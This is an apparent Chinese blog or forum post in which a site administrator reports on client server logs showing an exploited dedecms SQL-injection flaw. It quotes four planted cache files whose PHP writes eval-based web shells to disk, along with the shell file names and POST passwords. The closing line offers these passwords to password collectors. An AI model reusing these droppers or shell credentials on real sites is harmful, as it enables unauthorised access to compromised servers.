今天看日志,看到几个大黑客。客人的dedecms没有补dedesql.class.php的那个注入洞
975fb08ad5b2c7995d4bf371a1110bdf.inc821d1d2e4d6c5630.inc
<?php $z[0]=Array("php","file_put_contents('fuck.php','<?php eval(\$_POST[QQ245661320]);?>QQ:245661320');",0,100); ?>
a2bc2ea883c1a85f072f4f4b73cfe541.inc3a15e798ef57c0a1.inc
<?php $z[0]=Array("php","file_put_contents('list.inc.php','<?php eval(\$_POST[lists]);?>');",0,86); ?>
d8ae004d8fd11801dc297dfd8b23c1b1.incf56d27d52f914da9.inc
<?php $z[0]=Array("php","file_put_contents('90sec.php','<?php eval(\$_POST[guige]);?>');",0,83); ?>
f780c9224e963f6f6336cedc86903fd4.incc57e59babf4684fa.inc
<?php $z[0]=Array("php","file_put_contents('mybak.php','<?php eval(\$_POST[mybak]);?>');",0,83); ?>
喜欢收集密码的可以拿去。